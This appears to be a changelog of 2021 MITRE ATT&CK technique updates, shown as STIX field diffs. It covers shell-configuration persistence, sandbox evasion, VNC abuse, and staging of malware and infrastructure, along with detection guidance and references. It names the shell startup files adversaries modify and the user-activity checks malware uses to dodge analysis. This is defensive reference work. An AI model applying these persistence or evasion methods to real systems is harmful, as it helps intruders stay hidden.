descriptionAdversaries may establish persistence through executing malicious commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system (/etc) and the user’s home directory (~/) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately. Adversaries may attempt to establish persistence by inserting commands into scripts automatically executed by shells. Using bash as an example, the default shell for most GNU/Linux systems, adversaries may add commands that launch malicious binaries into the /etc/profile and /etc/profile.d files.(Citation: intezer-kaiji-malware)(Citation: bencane blog bashrc) These files typically require root permissions to modify and are executed each time any shell on a system launches. For user level permissions, adversaries can insert malicious commands into ~/.bash_profile, ~/.bash_login, or ~/.profile which are sourced when a user opens a command-line interface or connects remotely.(Citation: anomali-rocke-tactics)(Citation: Linux manual bash invocation) Since the system only executes the first existing file in the listed order, adversaries have used ~/.bash_profile to ensure execution. Adversaries have also leveraged the ~/.bashrc file which is additionally executed if the connection is established remotely or an additional interactive shell is opened, such as a new tab in the command-line interface.(Citation: Tsunami)(Citation: anomali-rocke-tactics)(Citation: anomali-linux-rabbit)(Citation: Magento) Some malware targets the termination of a program to trigger execution, adversaries can use the ~/.bash_logout file to execute malicious commands at the end of a session. For macOS, the functionality of this technique is similar but may leverage zsh, the default shell for macOS 10.15+. When the Terminal.app is opened, the application launches a zsh login shell and a zsh interactive shell. The login shell configures the system environment using /etc/profile, /etc/zshenv, /etc/zprofile, and /etc/zlogin.(Citation: ScriptingOSX zsh)(Citation: PersistentJXA_leopitt)(Citation: code_persistence_zsh) The login shell then configures the user environment with ~/.zprofile and ~/.zlogin. The interactive shell uses the ~/.zshrc to configure the user environment. Upon exiting, /etc/zlogout and ~/.zlogout are executed. For legacy programs, macOS executes /etc/bashrc on startup.Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system (/etc) and the user’s home directory (~/) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately. Adversaries may attempt to establish persistence by inserting commands into scripts automatically executed by shells. Using bash as an example, the default shell for most GNU/Linux systems, adversaries may add commands that launch malicious binaries into the /etc/profile and /etc/profile.d files.(Citation: intezer-kaiji-malware)(Citation: bencane blog bashrc) These files typically require root permissions to modify and are executed each time any shell on a system launches. For user level permissions, adversaries can insert malicious commands into ~/.bash_profile, ~/.bash_login, or ~/.profile which are sourced when a user opens a command-line interface or connects remotely.(Citation: anomali-rocke-tactics)(Citation: Linux manual bash invocation) Since the system only executes the first existing file in the listed order, adversaries have used ~/.bash_profile to ensure execution. Adversaries have also leveraged the ~/.bashrc file which is additionally executed if the connection is established remotely or an additional interactive shell is opened, such as a new tab in the command-line interface.(Citation: Tsunami)(Citation: anomali-rocke-tactics)(Citation: anomali-linux-rabbit)(Citation: Magento) Some malware targets the termination of a program to trigger execution, adversaries can use the ~/.bash_logout file to execute malicious commands at the end of a session. For macOS, the functionality of this technique is similar but may leverage zsh, the default shell for macOS 10.15+. When the Terminal.app is opened, the application launches a zsh login shell and a zsh interactive shell. The login shell configures the system environment using /etc/profile, /etc/zshenv, /etc/zprofile, and /etc/zlogin.(Citation: ScriptingOSX zsh)(Citation: PersistentJXA_leopitt)(Citation: code_persistence_zsh)(Citation: macOS MS office sandbox escape) The login shell then configures the user environment with ~/.zprofile and ~/.zlogin. The interactive shell uses the ~/.zshrc to configure the user environment. Upon exiting, /etc/zlogout and ~/.zlogout are executed. For legacy programs, macOS executes /etc/bashrc on startup.
external_references[11]['source_name']ESF_filemonitormacOS MS office sandbox escape
external_references[11]['description']Patrick Wardle. (2019, September 17). Writing a File Monitor with Apple's Endpoint Security Framework. Retrieved December 17, 2020.Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump. Retrieved August 20, 2021.
external_references[11]['url']https://objective-see.com/blog/blog_0x48.htmlhttps://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
x_mitre_version2.02.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'ESF_filemonitor', 'description': "Patrick Wardle. (2019, September 17). Writing a File Monitor with Apple's Endpoint Security Framework. Retrieved December 17, 2020.", 'url': 'https://objective-see.com/blog/blog_0x48.html'}

[T1608.001] Stage Capabilities: Upload Malware

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_data_sources['Internet Scan: Response Content']
values_changed
STIX FieldOld valueNew Value
modified2021-04-26 18:40:15.732000+00:002021-10-17 16:24:48.949000+00:00
x_mitre_detectionMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle, such as [User Execution](https://attack.mitre.org/techniques/T1204) or [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105).If infrastructure or patterns in malware have been previously identified, internet scanning may uncover when an adversary has staged malware to make it accessible for targeting. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle, such as [User Execution](https://attack.mitre.org/techniques/T1204) or [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105).
x_mitre_version1.01.1

[T1608.002] Stage Capabilities: Upload Tool

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_data_sources['Internet Scan: Response Content']
values_changed
STIX FieldOld valueNew Value
modified2021-04-26 18:41:37.444000+00:002021-10-17 16:25:37.072000+00:00
x_mitre_detectionMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle, such as [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105).If infrastructure or patterns in tooling have been previously identified, internet scanning may uncover when an adversary has staged tools to make them accessible for targeting. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle, such as [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105).
x_mitre_version1.01.1

[T1550] Use Alternate Authentication Material

Current version: 1.2

Version changed from: 1.1 → 1.2

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-14 18:09:47.427000+00:002021-10-17 14:15:31.630000+00:00
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_platformsIaaS

[T1497.002] Virtualization/Sandbox Evasion: User Activity Based Checks

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may employ various user activity checks to detect1Adversaries may employ various user activity checks to detec
>t and avoid virtualization and analysis environments. This m>t and avoid virtualization and analysis environments. This m
>ay include changing behaviors based on the results of checks>ay include changing behaviors based on the results of checks
> for the presence of artifacts indicative of a virtual machi> for the presence of artifacts indicative of a virtual machi
>ne environment (VME) or sandbox. If the adversary detects a >ne environment (VME) or sandbox. If the adversary detects a 
>VME, they may alter their malware to disengage from the vict>VME, they may alter their malware to disengage from the vict
>im or conceal the core functions of the implant. They may al>im or conceal the core functions of the implant. They may al
>so search for VME artifacts before dropping secondary or add>so search for VME artifacts before dropping secondary or add
>itional payloads. Adversaries may use the information learne>itional payloads. Adversaries may use the information learne
>d from [Virtualization/Sandbox Evasion](https://attack.mitre>d from [Virtualization/Sandbox Evasion](https://attack.mitre
>.org/techniques/T1497) during automated discovery to shape f>.org/techniques/T1497) during automated discovery to shape f
>ollow-on behaviors.   Adversaries may search for user activi>ollow-on behaviors.(Citation: Deloitte Environment Awareness
>ty on the host based on variables such as the speed/frequenc>)  Adversaries may search for user activity on the host base
>y of mouse movements and clicks (Citation: Sans Virtual Jan >d on variables such as the speed/frequency of mouse movement
>2016) , browser history, cache, bookmarks, or number of file>s and clicks (Citation: Sans Virtual Jan 2016) , browser his
>s in common directories such as home or the desktop. Other m>tory, cache, bookmarks, or number of files in common directo
>ethods may rely on specific user interaction with the system>ries such as home or the desktop. Other methods may rely on 
> before the malicious code is activated, such as waiting for>specific user interaction with the system before the malicio
> a document to close before activating a macro (Citation: Un>us code is activated, such as waiting for a document to clos
>it 42 Sofacy Nov 2018) or waiting for a user to double click>e before activating a macro (Citation: Unit 42 Sofacy Nov 20
> on an embedded image to activate.(Citation: FireEye FIN7 Ap>18) or waiting for a user to double click on an embedded ima
>ril 2017) >ge to activate.(Citation: FireEye FIN7 April 2017) 

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-07-01 16:32:02.491000+00:002021-10-18 14:57:48.362000+00:00
descriptionAdversaries may employ various user activity checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors. Adversaries may search for user activity on the host based on variables such as the speed/frequency of mouse movements and clicks (Citation: Sans Virtual Jan 2016) , browser history, cache, bookmarks, or number of files in common directories such as home or the desktop. Other methods may rely on specific user interaction with the system before the malicious code is activated, such as waiting for a document to close before activating a macro (Citation: Unit 42 Sofacy Nov 2018) or waiting for a user to double click on an embedded image to activate.(Citation: FireEye FIN7 April 2017) Adversaries may employ various user activity checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness) Adversaries may search for user activity on the host based on variables such as the speed/frequency of mouse movements and clicks (Citation: Sans Virtual Jan 2016) , browser history, cache, bookmarks, or number of files in common directories such as home or the desktop. Other methods may rely on specific user interaction with the system before the malicious code is activated, such as waiting for a document to close before activating a macro (Citation: Unit 42 Sofacy Nov 2018) or waiting for a user to double click on an embedded image to activate.(Citation: FireEye FIN7 April 2017)
external_references[1]['source_name']Sans Virtual Jan 2016Deloitte Environment Awareness
external_references[1]['description']Keragala, D. (2016, January 16). Detecting Malware and Sandbox Evasion Techniques. Retrieved April 17, 2019.Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved May 18, 2021.
external_references[1]['url']https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
external_references[2]['source_name']Unit 42 Sofacy Nov 2018Sans Virtual Jan 2016
external_references[2]['description']Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.Keragala, D. (2016, January 16). Detecting Malware and Sandbox Evasion Techniques. Retrieved April 17, 2019.
external_references[2]['url']https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
external_references[3]['source_name']FireEye FIN7 April 2017Unit 42 Sofacy Nov 2018
external_references[3]['description']Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017.Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
external_references[3]['url']https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.htmlhttps://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'FireEye FIN7 April 2017', 'description': 'Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017.', 'url': 'https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html'}

[T1204] User Execution

Current version: 1.4

Version changed from: 1.3 → 1.4

New Mitigations:

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-20 16:34:09.236000+00:002021-08-26 16:42:35.936000+00:00
x_mitre_version1.31.4

[T1564.007] Hide Artifacts: VBA Stomping

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-09-23 11:31:50.407000+00:002021-10-15 14:02:07.944000+00:00
x_mitre_contributors[0]Rick Cole, FireEyeRick Cole, Mandiant
x_mitre_data_sources[1]File: File ContentFile: File Metadata
x_mitre_version1.01.1

[T1021.005] Remote Services: VNC

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may use [Valid Accounts](https://attack.mitre.ort1Adversaries may use [Valid Accounts](https://attack.mitre.or
>g/techniques/T1078) to remotely control machines using Virtu>g/techniques/T1078) to remotely control machines using Virtu
>al Network Computing (VNC). The adversary may then perform a>al Network Computing (VNC).  VNC is a platform-independent d
>ctions as the logged-on user.  VNC is a desktop sharing syst>esktop sharing system that uses the RFB (“remote framebuffer
>em that allows users to remotely control another computer’s >”) protocol to enable users to remotely control another comp
>display by relaying mouse and keyboard inputs over the netwo>uter’s display by relaying the screen, mouse, and keyboard i
>rk. VNC does not necessarily use standard user credentials. >nputs over the network.(Citation: The Remote Framebuffer Pro
>Instead, a VNC client and server may be configured with sets>tocol)  VNC differs from [Remote Desktop Protocol](https://a
> of credentials that are used only for VNC connections.>ttack.mitre.org/techniques/T1021/001) as VNC is screen-shari
 >ng software rather than resource-sharing software. By defaul
 >t, VNC uses the system's authentication, but it can be confi
 >gured to use credentials specific to VNC.(Citation: MacOS VN
 >C software for Remote Desktop)(Citation: VNC Authentication)
 >  Adversaries may abuse VNC to perform malicious actions as 
 >the logged-on user such as opening documents, downloading fi
 >les, and running arbitrary commands. An adversary could use 
 >VNC to remotely control and monitor a system to collect data
 > and information to pivot to other systems within the networ
 >k. Specific VNC libraries/implementations have also been sus
 >ceptible to brute force attacks and memory usage exploitatio
 >n.(Citation: Hijacking VNC)(Citation: macOS root VNC login w
 >ithout authentication)(Citation: VNC Vulnerabilities)(Citati
 >on: Offensive Security VNC Authentication Check)(Citation: A
 >ttacking VNC Servers PentestLab)(Citation: Havana authentica
 >tion bug)

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-03-23 20:41:21.147000+00:002021-10-07 22:14:25.528000+00:00
descriptionAdversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC). The adversary may then perform actions as the logged-on user. VNC is a desktop sharing system that allows users to remotely control another computer’s display by relaying mouse and keyboard inputs over the network. VNC does not necessarily use standard user credentials. Instead, a VNC client and server may be configured with sets of credentials that are used only for VNC connections.Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC). VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computer’s display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol) VNC differs from [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) as VNC is screen-sharing software rather than resource-sharing software. By default, VNC uses the system's authentication, but it can be configured to use credentials specific to VNC.(Citation: MacOS VNC software for Remote Desktop)(Citation: VNC Authentication) Adversaries may abuse VNC to perform malicious actions as the logged-on user such as opening documents, downloading files, and running arbitrary commands. An adversary could use VNC to remotely control and monitor a system to collect data and information to pivot to other systems within the network. Specific VNC libraries/implementations have also been susceptible to brute force attacks and memory usage exploitation.(Citation: Hijacking VNC)(Citation: macOS root VNC login without authentication)(Citation: VNC Vulnerabilities)(Citation: Offensive Security VNC Authentication Check)(Citation: Attacking VNC Servers PentestLab)(Citation: Havana authentication bug)
x_mitre_detectionUse of VNC may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with VNC.Use of VNC may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior using VNC. On macOS systems log show --predicate 'process = "screensharingd" and eventMessage contains "Authentication:"' can be used to review incoming VNC connection attempts for suspicious activity.(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing) Monitor for use of built-in debugging environment variables (such as those containing credentials or other sensitive information) as well as test/default users on VNC servers, as these can leave openings for adversaries to abuse.(Citation: Gnome Remote Desktop grd-settings)(Citation: Gnome Remote Desktop gschema)
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'The Remote Framebuffer Protocol', 'description': 'T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote Framebuffer Protocol. Retrieved September 20, 2021.', 'url': 'https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2'}
external_references{'source_name': 'MacOS VNC software for Remote Desktop', 'description': 'Apple Support. (n.d.). Set up a computer running VNC software for Remote Desktop. Retrieved August 18, 2021.', 'url': 'https://support.apple.com/guide/remote-desktop/set-up-a-computer-running-vnc-software-apdbed09830/mac'}
external_references{'source_name': 'VNC Authentication', 'description': 'Tegan. (2019, August 15). Setting up System Authentication. Retrieved September 20, 2021.', 'url': 'https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication'}
external_references{'source_name': 'Hijacking VNC', 'description': 'Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute, Access and Crack). Retrieved September 20, 2021.', 'url': 'https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc'}
external_references{'source_name': 'macOS root VNC login without authentication', 'description': 'Nick Miles. (2017, November 30). Detecting macOS High Sierra root account without authentication. Retrieved September 20, 2021.', 'url': 'https://www.tenable.com/blog/detecting-macos-high-sierra-root-account-without-authentication'}
external_references{'source_name': 'VNC Vulnerabilities', 'description': 'Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities Found in Linux, Windows Solutions. Retrieved September 20, 2021.', 'url': 'https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/'}
external_references{'source_name': 'Offensive Security VNC Authentication Check', 'description': 'Offensive Security. (n.d.). VNC Authentication. Retrieved October 6, 2021.', 'url': 'https://www.offensive-security.com/metasploit-unleashed/vnc-authentication/'}
external_references{'source_name': 'Attacking VNC Servers PentestLab', 'description': 'Administrator, Penetration Testing Lab. (2012, October 30). Attacking VNC Servers. Retrieved October 6, 2021.', 'url': 'https://pentestlab.blog/2012/10/30/attacking-vnc-servers/'}
external_references{'source_name': 'Havana authentication bug', 'description': 'Jay Pipes. (2013, December 23). Security Breach! Tenant A is seeing the VNC Consoles of Tenant B!. Retrieved October 6, 2021.', 'url': 'http://lists.openstack.org/pipermail/openstack/2013-December/004138.html'}
external_references{'source_name': 'Apple Unified Log Analysis Remote Login and Screen Sharing', 'description': 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs: Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved August 19, 2021.', 'url': 'https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins'}
external_references{'source_name': 'Gnome Remote Desktop grd-settings', 'description': 'Pascal Nowack. (n.d.). Retrieved September 21, 2021.', 'url': 'https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/grd-settings.c#L207'}
external_references{'source_name': 'Gnome Remote Desktop gschema', 'description': 'Pascal Nowack. (n.d.). Retrieved September 21, 2021.', 'url': 'https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/org.gnome.desktop.remote-desktop.gschema.xml.in'}

[T1078] Valid Accounts

Current version: 2.3

Version changed from: 2.2 → 2.3

New Mitigations:

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-12 18:27:52.298000+00:002021-10-19 03:29:48.018000+00:00
x_mitre_version2.22.3
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsJon Sternstein, Stern Security
x_mitre_data_sourcesLogon Session: Logon Session Metadata

[T1583.003] Acquire Infrastructure: Virtual Private Server

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_data_sources['Internet Scan: Response Metadata', 'Internet Scan: Response Content']
values_changed
STIX FieldOld valueNew Value
modified2021-04-15 02:52:41.901000+00:002021-10-17 15:36:59.315000+00:00
x_mitre_detectionMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.Once adversaries have provisioned a VPS (ex: for use as a command and control server), internet scans may reveal servers that adversaries have acquired. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021) Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'ThreatConnect Infrastructure Dec 2020', 'description': 'ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.', 'url': 'https://threatconnect.com/blog/infrastructure-research-hunting/'}
external_references{'source_name': 'Mandiant SCANdalous Jul 2020', 'description': 'Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved October 12, 2021.', 'url': 'https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation'}
external_references{'source_name': 'Koczwara Beacon Hunting Sep 2021', 'description': 'Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with Shodan. Retrieved October 12, 2021.', 'url': 'https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2'}

[T1584.003] Compromise Infrastructure: Virtual Private Server

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_data_sources['Internet Scan: Response Metadata', 'Internet Scan: Response Content']
values_changed
STIX FieldOld valueNew Value
modified2021-04-15 03:03:59.919000+00:002021-10-17 15:59:02.770000+00:00
x_mitre_detectionMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.Once adversaries have provisioned software on a compromised VPS (ex: for use as a command and control server), internet scans may reveal VPSs that adversaries have compromised. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021) Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'ThreatConnect Infrastructure Dec 2020', 'description': 'ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.', 'url': 'https://threatconnect.com/blog/infrastructure-research-hunting/'}
external_references{'source_name': 'Mandiant SCANdalous Jul 2020', 'description': 'Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved October 12, 2021.', 'url': 'https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation'}
external_references{'source_name': 'Koczwara Beacon Hunting Sep 2021', 'description': 'Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with Shodan. Retrieved October 12, 2021.', 'url': 'https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2'}

[T1497] Virtualization/Sandbox Evasion

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
t1Adversaries may employ various means to detect and avoid virt1Adversaries may employ various means to detect and avoid vir
>tualization and analysis environments. This may include chan>tualization and analysis environments. This may include chan
>ging behaviors based on the results of checks for the presen>ging behaviors based on the results of checks for the presen
>ce of artifacts indicative of a virtual machine environment >ce of artifacts indicative of a virtual machine environment 
>(VME) or sandbox. If the adversary detects a VME, they may a>(VME) or sandbox. If the adversary detects a VME, they may a
>lter their malware to disengage from the victim or conceal t>lter their malware to disengage from the victim or conceal t
>he core functions of the implant. They may also search for V>he core functions of the implant. They may also search for V
>ME artifacts before dropping secondary or additional payload>ME artifacts before dropping secondary or additional payload
>s. Adversaries may use the information learned from [Virtual>s. Adversaries may use the information learned from [Virtual
>ization/Sandbox Evasion](https://attack.mitre.org/techniques>ization/Sandbox Evasion](https://attack.mitre.org/techniques
>/T1497) during automated discovery to shape follow-on behavi>/T1497) during automated discovery to shape follow-on behavi
>ors.   Adversaries may use several methods to accomplish [Vi>ors.(Citation: Deloitte Environment Awareness)  Adversaries 
>rtualization/Sandbox Evasion](https://attack.mitre.org/techn>may use several methods to accomplish [Virtualization/Sandbo
>iques/T1497) such as checking for security monitoring tools >x Evasion](https://attack.mitre.org/techniques/T1497) such a
>(e.g., Sysinternals, Wireshark, etc.) or other system artifa>s checking for security monitoring tools (e.g., Sysinternals
>cts associated with analysis or virtualization. Adversaries >, Wireshark, etc.) or other system artifacts associated with
>may also check for legitimate user activity to help determin> analysis or virtualization. Adversaries may also check for 
>e if it is in an analysis environment. Additional methods in>legitimate user activity to help determine if it is in an an
>clude use of sleep timers or loops within malware code to av>alysis environment. Additional methods include use of sleep 
>oid operating within a temporary sandbox.(Citation: Unit 42 >timers or loops within malware code to avoid operating withi
>Pirpi July 2015)  >n a temporary sandbox.(Citation: Unit 42 Pirpi July 2015)  

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-21 15:16:10.835000+00:002021-10-18 14:57:48.989000+00:00
descriptionAdversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors. Adversaries may use several methods to accomplish [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) such as checking for security monitoring tools (e.g., Sysinternals, Wireshark, etc.) or other system artifacts associated with analysis or virtualization. Adversaries may also check for legitimate user activity to help determine if it is in an analysis environment. Additional methods include use of sleep timers or loops within malware code to avoid operating within a temporary sandbox.(Citation: Unit 42 Pirpi July 2015) Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness) Adversaries may use several methods to accomplish [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) such as checking for security monitoring tools (e.g., Sysinternals, Wireshark, etc.) or other system artifacts associated with analysis or virtualization. Adversaries may also check for legitimate user activity to help determine if it is in an analysis environment. Additional methods include use of sleep timers or loops within malware code to avoid operating within a temporary sandbox.(Citation: Unit 42 Pirpi July 2015)
external_references[1]['source_name']Unit 42 Pirpi July 2015Deloitte Environment Awareness
external_references[1]['description']Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April 23, 2019.Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved May 18, 2021.
external_references[1]['url']https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Unit 42 Pirpi July 2015', 'description': 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April 23, 2019.', 'url': 'https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/'}

[T1059.005] Command and Scripting Interpreter: Visual Basic

Current version: 1.2

Version changed from: 1.1 → 1.2

New Mitigations:

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-08-13 20:09:39.122000+00:002021-08-16 21:03:21.051000+00:00
x_mitre_version1.11.2

[T1606.001] Forge Web Credentials: Web Cookies

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_contributors['Jen Burns, HubSpot']
values_changed
STIX FieldOld valueNew Value
modified2021-01-11 20:31:36.404000+00:002021-09-20 16:48:28.041000+00:00
